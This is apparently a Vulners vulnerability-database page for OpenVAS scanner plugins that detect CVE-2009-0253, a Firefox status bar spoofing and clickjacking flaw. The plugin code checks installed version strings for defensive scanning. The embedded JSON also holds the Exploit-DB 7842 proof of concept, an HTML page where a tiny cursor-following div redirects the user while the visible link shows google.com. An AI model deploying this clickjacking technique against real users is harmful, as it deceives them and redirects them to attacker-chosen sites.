Search...

Firefox Status Bar Spoofing Vulnerability (Linux)

2009-01-28T00:00:00

ID OPENVAS:1361412562310900447
Type openvas
Reporter Copyright (C) 2009 SecPod
Modified 2018-12-03T00:00:00

Description

The host is installed with Mozilla Firefox browser and is prone to status bar spoofing vulnerability.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_firefox_status_bar_spoof_vuln_lin.nasl 12629 2018-12-03 15:19:43Z cfischer $
#
# Firefox Status Bar Spoofing Vulnerability (Linux)
#
# Authors:
# Sujit Ghosal &lt;sghosal@secpod.com&gt;
#
# Copyright:
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.900447");
  script_version("$Revision: 12629 $");
  script_tag(name:"last_modification", value:"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $");
  script_tag(name:"creation_date", value:"2009-01-28 13:27:12 +0100 (Wed, 28 Jan 2009)");
  script_tag(name:"cvss_base", value:"6.8");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2009-0253");
  script_name("Firefox Status Bar Spoofing Vulnerability (Linux)");
  script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/7842");
  script_xref(name:"URL", value:"http://security-tracker.debian.net/tracker/CVE-2009-0253");

  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2009 SecPod");
  script_family("Web application abuses");
  script_dependencies("gb_firefox_detect_lin.nasl");
  script_mandatory_keys("Firefox/Linux/Ver");
  script_tag(name:"impact", value:"Successful remote exploitation will let the attacker spoof the status
  bar information and can gain sensitive information by redirecting the
  authentic user to any malicious URL.");
  script_tag(name:"affected", value:"Mozilla Firefox version 3.0.5 and 2.0.0.18/19 on Linux.");
  script_tag(name:"insight", value:"Firefox doesn't properly handle the crafted URL which is being displayed in
  the user's browser which lets the attacker perform clickjacking attack and
  can spoof the user redirect to a different arbitrary malformed website.");
  script_tag(name:"solution", value:"Upgrade to Mozilla Firefox version 3.6.3 or later");
  script_tag(name:"summary", value:"The host is installed with Mozilla Firefox browser and is prone
  to status bar spoofing vulnerability.");
  script_tag(name:"qod_type", value:"executable_version");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"http://www.getfirefox.com");
  exit(0);
}


firefoxVer = get_kb_item("Firefox/Linux/Ver");
if(firefoxVer =~ "(2.0.0.18|2.0.0.19|3.0.5)"){
  security_message( port: 0, data: "The target host was found to be vulnerable" );
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310900447", "type": "openvas", "bulletinFamily": "scanner", "title": "Firefox Status Bar Spoofing Vulnerability (Linux)", "description": "The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.", "published": "2009-01-28T00:00:00", "modified": "2018-12-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900447", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://www.getfirefox.com", "http://www.milw0rm.com/exploits/7842", "http://security-tracker.debian.net/tracker/CVE-2009-0253"], "cvelist": ["CVE-2009-0253"], "lastseen": "2019-05-29T18:40:16", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0253"]}, {"type": "openvas", "idList": ["OPENVAS:900447", "OPENVAS:1361412562310900446", "OPENVAS:900446"]}, {"type": "exploitdb", "idList": ["EDB-ID:7842"]}], "modified": "2019-05-29T18:40:16", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2019-05-29T18:40:16", "rev": 2}, "vulnersScore": 6.6}, "pluginID": "1361412562310900447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_firefox_status_bar_spoof_vuln_lin.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Firefox Status Bar Spoofing Vulnerability (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900447\");\n script_version(\"$Revision: 12629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:27:12 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-0253\");\n script_name(\"Firefox Status Bar Spoofing Vulnerability (Linux)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7842\");\n script_xref(name:\"URL\", value:\"http://security-tracker.debian.net/tracker/CVE-2009-0253\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_mandatory_keys(\"Firefox/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful remote exploitation will let the attacker spoof the status\n bar information and can gain sensitive information by redirecting the\n authentic user to any malicious URL.\");\n script_tag(name:\"affected\", value:\"Mozilla Firefox version 3.0.5 and 2.0.0.18/19 on Linux.\");\n script_tag(name:\"insight\", value:\"Firefox doesn't properly handle the crafted URL which is being displayed in\n the user's browser which lets the attacker perform clickjacking attack and\n can spoof the user redirect to a different arbitrary malformed website.\");\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 3.6.3 or later\");\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.getfirefox.com\");\n exit(0);\n}\n\n\nfirefoxVer = get_kb_item(\"Firefox/Linux/Ver\");\nif(firefoxVer =~ \"(2.0.0.18|2.0.0.19|3.0.5)\"){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "naslFamily": "Web application abuses", "immutableFields": []}

{"cve": [{"lastseen": "2021-02-02T05:39:58", "description": "Mozilla Firefox 3.0.5 allows remote attackers to trick a user into visiting an arbitrary URL via an onclick action that moves a crafted element to the current mouse position, related to a \"Status Bar Obfuscation\" and \"Clickjacking\" attack.", "edition": 4, "cvss3": {}, "published": "2009-01-22T18:30:00", "title": "CVE-2009-0253", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0253"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:mozilla:firefox:3.0.5"], "id": "CVE-2009-0253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0253", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:3.0.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-02T21:13:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0253"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.", "modified": "2017-01-20T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:900447", "href": "http://plugins.openvas.org/nasl.php?oid=900447", "type": "openvas", "title": "Firefox Status Bar Spoofing Vulnerability (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_firefox_status_bar_spoof_vuln_lin.nasl 5055 2017-01-20 14:08:39Z teissa $\n#\n# Firefox Status Bar Spoofing Vulnerability (Linux)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful remote exploitation will let the attacker spoof the status\n bar information and can gain sensitive information by redirecting the\n authentic user to any malicious URL.\n Impact Level: Application\";\ntag_affected = \"Mozilla Firefox version 3.0.5 and 2.0.0.18/19 on Linux.\";\ntag_insight = \"Firefox doesn't properly handle the crafted URL which is being displayed in\n the user's browser which lets the attacker perform clickjacking attack and\n can spoof the user redirect to a different arbitrary malformed website.\";\ntag_solution = \"Upgrade to Mozilla Firefox version 3.6.3 or later\n For updates refer to http://www.getfirefox.com\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.\";\n\nif(description)\n{\n script_id(900447);\n script_version(\"$Revision: 5055 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-20 15:08:39 +0100 (Fri, 20 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:27:12 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-0253\");\n script_name(\"Firefox Status Bar Spoofing Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7842\");\n script_xref(name : \"URL\" , value : \"http://security-tracker.debian.net/tracker/CVE-2009-0253\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_firefox_detect_lin.nasl\");\n script_require_keys(\"Firefox/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\nfirefoxVer = get_kb_item(\"Firefox/Linux/Ver\");\n#Check for firefox version 3.0.5 or 2.0.0.18/2.0.0.19\nif(firefoxVer =~ \"(2.0.0.18|2.0.0.19|3.0.5)\"){\n security_message(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:14:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0253"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.", "modified": "2017-01-20T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:900446", "href": "http://plugins.openvas.org/nasl.php?oid=900446", "type": "openvas", "title": "Firefox Status Bar Spoofing Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_firefox_status_bar_spoof_vuln_win.nasl 5055 2017-01-20 14:08:39Z teissa $\n#\n# Firefox Status Bar Spoofing Vulnerability (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful remote exploitation will let the attacker spoof the status\n bar information and can gain sensitive information by redirecting the\n authentic user to any malicious URL.\n Impact Level: Application\";\ntag_affected = \"Mozilla Firefox version 3.0.5 and 2.0.0.18/19 on Windows.\";\ntag_insight = \"Firefox doesn't properly handle the crafted URL which is being displayed in\n the user's browser which lets the attacker perform clickjacking attack and\n can spoof the user redirect to a different arbitrary malformed website.\";\ntag_solution = \"Upgrade to Mozilla Firefox version 3.6.3 or later\n updates refer, http://www.getfirefox.com\";\ntag_summary = \"The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.\";\n\nif(description)\n{\n script_id(900446);\n script_version(\"$Revision: 5055 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-20 15:08:39 +0100 (Fri, 20 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:27:12 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-0253\");\n script_name(\"Firefox Status Bar Spoofing Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/7842\");\n script_xref(name : \"URL\" , value : \"http://security-tracker.debian.net/tracker/CVE-2009-0253\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_firefox_detect_win.nasl\");\n script_require_keys(\"Firefox/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\nfirefoxVer = get_kb_item(\"Firefox/Win/Ver\");\n#Check for firefox version 3.0.5 or 2.0.0.18/2.0.0.19\nif(firefoxVer =~ \"(2.0.0.18|2.0.0.19|3.0.5)\"){\n security_message(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0253"], "description": "The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.", "modified": "2018-12-03T00:00:00", "published": "2009-01-28T00:00:00", "id": "OPENVAS:1361412562310900446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900446", "type": "openvas", "title": "Firefox Status Bar Spoofing Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_firefox_status_bar_spoof_vuln_win.nasl 12629 2018-12-03 15:19:43Z cfischer $\n#\n# Firefox Status Bar Spoofing Vulnerability (Windows)\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900446\");\n script_version(\"$Revision: 12629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-03 16:19:43 +0100 (Mon, 03 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-28 13:27:12 +0100 (Wed, 28 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2009-0253\");\n script_name(\"Firefox Status Bar Spoofing Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7842\");\n script_xref(name:\"URL\", value:\"http://security-tracker.debian.net/tracker/CVE-2009-0253\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_firefox_detect_portable_win.nasl\");\n script_mandatory_keys(\"Firefox/Win/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful remote exploitation will let the attacker spoof the status\n bar information and can gain sensitive information by redirecting the authentic user to any malicious URL.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox version 3.0.5 and 2.0.0.18/19 on Windows.\");\n\n script_tag(name:\"insight\", value:\"Firefox doesn't properly handle the crafted URL which is being displayed in\n the user's browser which lets the attacker perform clickjacking attack and\n can spoof the user redirect to a different arbitrary malformed website.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 3.6.3 or later.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Mozilla Firefox browser and is prone\n to status bar spoofing vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\nfirefoxVer = get_kb_item(\"Firefox/Win/Ver\");\nif(firefoxVer =~ \"^(2\\.0\\.0\\.18|2\\.0\\.0\\.19|3\\.0\\.5)\"){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T03:11:09", "description": "Firefox 3.0.5 Status Bar Obfuscation / Clickjacking. CVE-2009-0253. Remote exploit for windows platform", "published": "2009-01-21T00:00:00", "type": "exploitdb", "title": "Firefox 3.0.5 Status Bar Obfuscation / Clickjacking", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0253"], "modified": "2009-01-21T00:00:00", "id": "EDB-ID:7842", "href": "https://www.exploit-db.com/exploits/7842/", "sourceData": "Firefox 3.0.5 Status Bar Obfuscation / Clickjacking\n===========================================\n\n<html>\n<body>\n<div id=\"mydiv\"\nonmouseover=\"document.location='http://www.milw0rm.com';\"\nstyle=\"position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px\"></div>\n<script>\nfunction updatebox(evt) {\nmouseX=evt.pageX?evt.pageX:evt.clientX;\nmouseY=evt.pageY?evt.pageY:evt.clientY;\ndocument.getElementById('mydiv').style.left=mouseX-1;\ndocument.getElementById('mydiv').style.top=mouseY-1;\n}\n</script>\n<center>\n<br>\n<font style=\"font-family:arial;font-size:32px\">Status Bar Obfuscation\n/ Clickjacking</font><br>\n<font style=\"font-family:arial;font-size:24px\">By MrDoug</font><br>\n<br>\n<hr size=\"3\" width=\"500\" color=\"#000000\">\n<br>\n<font style=\"font-family:arial;font-size:20px\">Click the VALID link to\ngoogle below to visit milw0rm.com</font><br>\n<br>\n<a href=\"http://www.google.com\" onclick=\"updatebox(event)\"><font\nstyle=\"font-family:arial;font-size:32px\">http://www.google.com</font></a><br>\n<br>\n<hr size=\"3\" width=\"500\" color=\"#000000\">\n<br>\n<font style=\"font-family:arial;font-size:16px\">Greetz to Slappywag</font><br>\n</center>\n<div style=\"position:absolute;bottom:0;\">\n<font style=\"font-family:arial;font-size:32px\">Note this...<br>\n      | <br>\n     V\n</font>\n</div>\n</body>\n</html>\n\n===========================================\nMrDoug\nmrdoug13[at]gmail[dot]com\n\n# milw0rm.com [2009-01-21]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7842/"}]}